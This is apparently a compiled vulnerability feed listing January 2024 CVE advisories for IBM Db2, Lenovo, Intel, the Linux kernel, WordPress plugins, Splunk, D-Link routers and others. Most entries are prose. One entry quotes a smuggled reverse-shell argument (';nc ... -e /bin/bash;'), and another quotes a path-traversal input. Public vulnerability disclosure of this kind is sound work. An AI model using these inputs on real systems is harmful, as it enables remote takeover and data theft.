https://www.ibm.com/support/pages/node/7107712 | source : psirt@us.ibm.com

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-47746

First published on : 22-01-2024 19:15:08
Last modified on : 22-01-2024 20:28:17

Description :
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 272644.

CVE ID : CVE-2023-47746
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/272644 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105505 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47158

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.1, 10.5, and 11.1 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 270750.

CVE ID : CVE-2023-47158
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/270750 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105496 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47747

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.1, 10.5, and 11.1 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 272646.

CVE ID : CVE-2023-47747
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/272646 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105502 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47141

First published on : 22-01-2024 21:15:09
Last modified on : 22-01-2024 21:15:09

Description :
IIBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 270264.

CVE ID : CVE-2023-47141
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/270264 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105497 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47718

First published on : 19-01-2024 02:15:07
Last modified on : 19-01-2024 15:56:26

Description :
IBM Maximo Asset Management 7.6.1.3 and Manage Component 8.10 through 8.11 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 271843.

CVE ID : CVE-2023-47718
Source : psirt@us.ibm.com
CVSS Score : 4.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271843 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107738 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107740 | source : psirt@us.ibm.com

Vulnerability : CWE-352


Source : lenovo.com

Vulnerability ID : CVE-2023-5080

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
A privilege escalation vulnerability was reported in some Lenovo tablet products that could allow local applications access to device identifiers and system commands.

CVE ID : CVE-2023-5080
Source : psirt@lenovo.com
CVSS Score : 6.8

References :
https://support.lenovo.com/us/en/product_security/LEN-142135 | source : psirt@lenovo.com

Vulnerability : CWE-269


Vulnerability ID : CVE-2023-6044

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker with physical access to impersonate Lenovo Vantage Service and execute arbitrary code with elevated privileges.

CVE ID : CVE-2023-6044
Source : psirt@lenovo.com
CVSS Score : 6.3

References :
https://support.lenovo.com/us/en/product_security/LEN-144736 | source : psirt@lenovo.com

Vulnerability : CWE-290


Vulnerability ID : CVE-2023-6450

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
An incorrect permissions vulnerability was reported in the Lenovo App Store app that could allow an attacker to use system resources, resulting in a denial of service.

CVE ID : CVE-2023-6450
Source : psirt@lenovo.com
CVSS Score : 5.5

References :
https://iknow.lenovo.com.cn/detail/419672 | source : psirt@lenovo.com

Vulnerability : CWE-400


Source : intel.com

Vulnerability ID : CVE-2023-28722

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Improper buffer restrictions for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-28722
Source : secure@intel.com
CVSS Score : 6.7

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01009.html | source : secure@intel.com

Vulnerability : CWE-92


Vulnerability ID : CVE-2023-29244

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Incorrect default permissions in some Intel Integrated Sensor Hub (ISH) driver for Windows 10 for Intel NUC P14E Laptop Element software installers before version 5.4.1.4479 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-29244
Source : secure@intel.com
CVSS Score : 6.7

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00964.html | source : secure@intel.com

Vulnerability : CWE-276


Vulnerability ID : CVE-2023-38541

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Insecure inherited permissions in some Intel HID Event Filter drivers for Windows 10 for some Intel NUC laptop software installers before version 2.2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-38541
Source : secure@intel.com
CVSS Score : 6.7

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00964.html | source : secure@intel.com

Vulnerability : CWE-277


Source : redhat.com

Vulnerability ID : CVE-2024-0775

First published on : 22-01-2024 13:15:25
Last modified on : 22-01-2024 14:01:09

Description :
A use-after-free flaw was found in the __ext4_remount in fs/ext4/super.c in ext4 in the Linux kernel. This flaw allows a local user to cause an information leak problem while freeing the old quota file names before a potential failure, leading to a use-after-free.

CVE ID : CVE-2024-0775
Source : secalert@redhat.com
CVSS Score : 6.7

References :
https://access.redhat.com/security/cve/CVE-2024-0775 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2259414 | source : secalert@redhat.com
https://scm.linefinity.com/common/linux-stable/commit/4c0b4818b1f636bc96359f7817a2d8bab6370162 | source : secalert@redhat.com

Vulnerability : CWE-416


Source : patchstack.com

Vulnerability ID : CVE-2022-45083

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
Deserialization of Untrusted Data vulnerability in ProfilePress Membership Team Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress.This issue affects Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress: from n/a through 4.3.2.

CVE ID : CVE-2022-45083
Source : audit@patchstack.com
CVSS Score : 6.6

References :
https://patchstack.com/database/vulnerability/wp-user-avatar/wordpress-profilepress-plugin-4-3-2-auth-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2022-47160

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wpmet Wp Social Login and Register Social Counter.This issue affects Wp Social Login and Register Social Counter: from n/a through 1.9.0.

CVE ID : CVE-2022-47160
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/wp-social/wordpress-wp-social-plugin-1-9-0-auth-sensitive-information-disclosure-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2022-45845

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
Deserialization of Untrusted Data vulnerability in Nextend Smart Slider 3.This issue affects Smart Slider 3: from n/a through 3.5.1.9.

CVE ID : CVE-2022-45845
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/smart-slider-3/wordpress-smart-slider-3-plugin-3-5-1-9-auth-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Source : github.com

Vulnerability ID : CVE-2024-22420

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. This vulnerability depends on user interaction by opening a malicious Markdown file using JupyterLab preview feature. A malicious user can access any data that the attacked user has access to as well as perform arbitrary requests acting as the attacked user. JupyterLab version 4.0.11 has been patched. Users are advised to upgrade. Users unable to upgrade should disable the table of contents extension.

CVE ID : CVE-2024-22420
Source : security-advisories@github.com
CVSS Score : 6.5

References :
https://github.com/jupyterlab/jupyterlab/commit/e1b3aabab603878e46add445a3114e838411d2df | source : security-advisories@github.com
https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-4m77-cmpx-vjc4 | source : security-advisories@github.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-44395

First published on : 22-01-2024 15:15:08
Last modified on : 22-01-2024 19:10:26

Description :
Autolab is a course management service that enables instructors to offer autograded programming assignments to their students over the Web. Path traversal vulnerabilities were discovered in Autolab's assessment functionality in versions of Autolab prior to 2.12.0, whereby instructors can perform arbitrary file reads. Version 2.12.0 contains a patch. There are no feasible workarounds for this issue.

CVE ID : CVE-2023-44395
Source : security-advisories@github.com
CVSS Score : 4.9

References :
https://github.com/autolab/Autolab/releases/tag/v2.12.0 | source : security-advisories@github.com
https://github.com/autolab/Autolab/security/advisories/GHSA-h8wq-ghfq-5hfx | source : security-advisories@github.com
https://www.stackhawk.com/blog/rails-path-traversal-guide-examples-and-prevention/ | source : security-advisories@github.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2024-23332

First published on : 19-01-2024 23:15:07
Last modified on : 20-01-2024 02:58:09

Description :
The Notary Project is a set of specifications and tools intended to provide a cross-industry standard for securing software supply chains by using authentic container images and other OCI artifacts. An external actor with control of a compromised container registry can provide outdated versions of OCI artifacts, such as Images. This could lead artifact consumers with relaxed trust policies (such as `permissive` instead of `strict`) to potentially use artifacts with signatures that are no longer valid, making them susceptible to any exploits those artifacts may contain. In Notary Project, an artifact publisher can control the validity period of artifact by specifying signature expiry during the signing process. Using shorter signature validity periods along with processes to periodically resign artifacts, allows artifact producers to ensure that their consumers will only receive up-to-date artifacts. Artifact consumers should correspondingly use a `strict` or equivalent trust policy that enforces signature expiry. Together these steps enable use of up-to-date artifacts and safeguard against rollback attack in the event of registry compromise. The Notary Project offers various signature validation options such as `permissive`, `audit` and `skip` to support various scenarios. These scenarios includes 1) situations demanding urgent workload deployment, necessitating the bypassing of expired or revoked signatures; 2) auditing of artifacts lacking signatures without interrupting workload; and 3) skipping of verification for specific images that might have undergone validation through alternative mechanisms. Additionally, the Notary Project supports revocation to ensure the signature freshness. Artifact publishers can sign with short-lived certificates and revoke older certificates when necessary. This revocation serves as a signal to inform artifact consumers that the corresponding unexpired artifact is no longer approved by the publisher. This enables the artifact publisher to control the validity of the signature independently of their ability to manage artifacts in a compromised registry.

CVE ID : CVE-2024-23332
Source : security-advisories@github.com
CVSS Score : 4.0

References :
https://github.com/notaryproject/specifications/commit/cdabdd1042de2999c685fa5d422a785ded9c983a | source : security-advisories@github.com
https://github.com/notaryproject/specifications/security/advisories/GHSA-57wx-m636-g3g8 | source : security-advisories@github.com

Vulnerability : CWE-672


Source : wordfence.com

Vulnerability ID : CVE-2024-0679

First published on : 20-01-2024 06:15:44
Last modified on : 22-01-2024 14:01:14

Description :
The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins.

CVE ID : CVE-2024-0679
Source : security@wordfence.com
CVSS Score : 6.5

References :
https://themes.trac.wordpress.org/browser/colormag/3.1.2/functions.php#L237 | source : security@wordfence.com
https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=214568%40colormag&new=214568%40colormag&sfp_email=&sfph_mail= | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/e982d457-29db-468f-88c3-5afe04002dcf?source=cve | source : security@wordfence.com


Vulnerability ID : CVE-2024-0623

First published on : 20-01-2024 06:15:44
Last modified on : 22-01-2024 14:01:14

Description :
The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE ID : CVE-2024-0623
Source : security@wordfence.com
CVSS Score : 4.3

References :
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023842%40vk-block-patterns&new=3023842%40vk-block-patterns&sfp_email=&sfph_mail= | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/9af6c319-7660-4368-b2f8-1ed1d01ee73a?source=cve | source : security@wordfence.com


Source : splunk.com

Vulnerability ID : CVE-2024-23675

First published on : 22-01-2024 21:15:10
Last modified on : 22-01-2024 21:15:10

Description :
In Splunk Enterprise versions below 9.0.8 and 9.1.3, Splunk app key value store (KV Store) improperly handles permissions for users that use the REST application programming interface (API). This can potentially result in the deletion of KV Store collections.

CVE ID : CVE-2024-23675
Source : prodsec@splunk.com
CVSS Score : 6.5

References :
https://advisory.splunk.com/advisories/SVD-2024-0105 | source : prodsec@splunk.com

Vulnerability : CWE-284


Vulnerability ID : CVE-2024-23676

First published on : 22-01-2024 21:15:10
Last modified on : 22-01-2024 21:15:10

Description :
In Splunk versions below 9.0.8 and 9.1.3, the “mrollup” SPL command lets a low-privileged user view metrics on an index that they do not have permission to view. This vulnerability requires user interaction from a high-privileged user to exploit.

CVE ID : CVE-2024-23676
Source : prodsec@splunk.com
CVSS Score : 4.6

References :
https://advisory.splunk.com/advisories/SVD-2024-0106 | source : prodsec@splunk.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2024-23677

First published on : 22-01-2024 21:15:10
Last modified on : 22-01-2024 21:15:10

Description :
In Splunk Enterprise versions below 9.0.8, the Splunk RapidDiag utility discloses server responses from external applications in a log file.

CVE ID : CVE-2024-23677
Source : prodsec@splunk.com
CVSS Score : 4.3

References :
https://advisory.splunk.com/advisories/SVD-2024-0107 | source : prodsec@splunk.com

Vulnerability : CWE-532


Source : vuldb.com

Vulnerability ID : CVE-2024-0714

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0714
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://vuldb.com/?ctiid.251540 | source : cna@vuldb.com
https://vuldb.com/?id.251540 | source : cna@vuldb.com

Vulnerability : CWE-78


Vulnerability ID : CVE-2024-0730

First published on : 19-01-2024 19:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability, which was classified as critical, was found in Project Worlds Online Time Table Generator 1.0. This affects an unknown part of the file course_ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251553 was assigned to this vulnerability.

CVE ID : CVE-2024-0730
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://torada.notion.site/SQL-injection-at-course_ajax-php-485d8cca5f8c43dfb1f76c7336a4a45e | source : cna@vuldb.com
https://vuldb.com/?ctiid.251553 | source : cna@vuldb.com
https://vuldb.com/?id.251553 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0733

First published on : 19-01-2024 21:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability was found in Smsot up to 2.12. It has been classified as critical. Affected is an unknown function of the file /api.php of the component HTTP POST Request Handler. The manipulation of the argument data[sign] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251556.

CVE ID : CVE-2024-0733
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://note.zhaoj.in/share/3GznRo9vWRJ8 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251556 | source : cna@vuldb.com
https://vuldb.com/?id.251556 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0734

First published on : 19-01-2024 21:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability was found in Smsot up to 2.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /get.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251557 was assigned to this vulnerability.

CVE ID : CVE-2024-0734
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://note.zhaoj.in/share/vo1KOw3EYmBK | source : cna@vuldb.com
https://vuldb.com/?ctiid.251557 | source : cna@vuldb.com
https://vuldb.com/?id.251557 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0735

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. Affected by this issue is the function exec of the file admin/operations/expense.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251558 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0735
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://blog.csdn.net/DMZNX/article/details/135683738 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251558 | source : cna@vuldb.com
https://vuldb.com/?id.251558 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0738

First published on : 19-01-2024 22:15:07
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability, which was classified as critical, has been found in ???? mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability.

CVE ID : CVE-2024-0738
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251561 | source : cna@vuldb.com
https://vuldb.com/?id.251561 | source : cna@vuldb.com

Vulnerability : CWE-94


Vulnerability ID : CVE-2024-0783

First published on : 22-01-2024 18:15:20
Last modified on : 22-01-2024 19:10:26

Description :
A vulnerability was found in Project Worlds Online Admission System 1.0 and classified as critical. This issue affects some unknown processing of the file documents.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251699.

CVE ID : CVE-2024-0783
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/keru6k/Online-Admission-System-RCE-PoC | source : cna@vuldb.com
https://github.com/keru6k/Online-Admission-System-RCE-PoC/blob/main/poc.py | source : cna@vuldb.com
https://vuldb.com/?ctiid.251699 | source : cna@vuldb.com
https://vuldb.com/?id.251699 | source : cna@vuldb.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2024-0784

First published on : 22-01-2024 18:15:20
Last modified on : 22-01-2024 19:10:26

Description :
A vulnerability was found in biantaibao octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/role/list. The manipulation of the argument dataScope leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-251700.

CVE ID : CVE-2024-0784
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/biantaibao/octopus_SQL/blob/main/report.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251700 | source : cna@vuldb.com
https://vuldb.com/?id.251700 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0729

First published on : 19-01-2024 19:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. Affected by this issue is some unknown functionality of the file cms_admin.php. The manipulation of the argument a_name leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251552.

CVE ID : CVE-2024-0729
Source : cna@vuldb.com
CVSS Score : 5.5

References :
https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251552 | source : cna@vuldb.com
https://vuldb.com/?id.251552 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0717

First published on : 19-01-2024 16:15:11
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0717
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://github.com/999zzzzz/D-Link | source : cna@vuldb.com
https://vuldb.com/?ctiid.251542 | source : cna@vuldb.com
https://vuldb.com/?id.251542 | source : cna@vuldb.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2024-0723

First published on : 19-01-2024 17:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability was found in freeSSHd 1.0.9 on Windows. It has been classified as problematic. This affects an unknown part. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251547.

CVE ID : CVE-2024-0723
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://packetstormsecurity.com/files/176545/freeSSHd-1.0.9-Denial-Of-Service.html | source : cna@vuldb.com
https://vuldb.com/?ctiid.251547 | source : cna@vuldb.com
https://vuldb.com/?id.251547 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0725

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability was found in ProSSHD 1.2 on Windows. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251548.

CVE ID : CVE-2024-0725
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://packetstormsecurity.com/files/176544/ProSSHD-1.2-20090726-Denial-Of-Service.html | source : cna@vuldb.com
https://vuldb.com/?ctiid.251548 | source : cna@vuldb.com
https://vuldb.com/?id.251548 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0731

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability has been found in PCMan FTP Server 2.0.7 and classified as problematic. This vulnerability affects unknown code of the component PUT Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251554 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0731
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://fitoxs.com/vuldb/01-PCMan%20v2.0.7-exploit.txt | source : cna@vuldb.com
https://vuldb.com/?ctiid.251554 | source : cna@vuldb.com
https://vuldb.com/?id.251554 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0732

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability was found in PCMan FTP Server 2.0.7 and classified as problematic. This issue affects some unknown processing of the component STOR Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251555.

CVE ID : CVE-2024-0732
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://fitoxs.com/vuldb/02-PCMan%20v2.0.7-exploit.txt | source : cna@vuldb.com
https://vuldb.com/?ctiid.251555 | source : cna@vuldb.com
https://vuldb.com/?id.251555 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0736

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability classified as problematic has been found in EFS Easy File Sharing FTP 3.6. This affects an unknown part of the component Login. The manipulation of the argument password leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251559.

CVE ID : CVE-2024-0736
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://0day.today/exploit/39249 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251559 | source : cna@vuldb.com
https://vuldb.com/?id.251559 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0737

First published on : 19-01-2024 22:15:07
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560.

CVE ID : CVE-2024-0737
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://packetstormsecurity.com/files/176553/LightFTP-1.1-Denial-Of-Service.html | source : cna@vuldb.com
https://vuldb.com/?ctiid.251560 | source : cna@vuldb.com
https://vuldb.com/?id.251560 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0769

First published on : 21-01-2024 08:15:07
Last modified on : 22-01-2024 14:01:14

Description :
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DIR-859 1.06B01. It has been rated as critical. Affected by this issue is some unknown functionality of the file /hedwig.cgi of the component HTTP POST Request Handler. The manipulation of the argument service with the input ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251666 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.

CVE ID : CVE-2024-0769
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://github.com/c2dc/cve-reported/blob/main/CVE-2024-0769/CVE-2024-0769.md | source : cna@vuldb.com
https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10371 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251666 | source : cna@vuldb.com
https://vuldb.com/?id.251666 | source : cna@vuldb.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2024-0771

First published on : 21-01-2024 23:15:44
Last modified on : 22-01-2024 14:01:09

Description :
A vulnerability has been found in Nsasoft Product Key Explorer 4.0.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0771
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://vuldb.com/?ctiid.251671 | source : cna@vuldb.com
https://vuldb.com/?id.251671 | source : cna@vuldb.com
https://youtu.be/eecN5mC0avU | source : cna@vuldb.com

Vulnerability : CWE-119


Vulnerability ID : CVE-2024-0772

First published on : 22-01-2024 00:15:06
Last modified on : 22-01-2024 14:01:09

Description :
A vulnerability was found in Nsasoft ShareAlarmPro 2.1.4 and classified as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0772
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://vuldb.com/?ctiid.251672 | source : cna@vuldb.com
https://vuldb.com/?id.251672 | source : cna@vuldb.com
https://youtu.be/WIeWeuXbkiY | source : cna@vuldb.com

Vulnerability : CWE-119


Vulnerability ID : CVE-2024-0774

First published on : 22-01-2024 01:15:08
Last modified on : 22-01-2024 14:01:09

Description :
A vulnerability was found in Any-Capture Any Sound Recorder 2.93. It has been declared as problematic. This vulnerability affects unknown code of the component Registration Handler. The manipulation of the argument User Name/Key Code leads to memory corruption. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-251674 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0774
Source : cna@vuldb.com
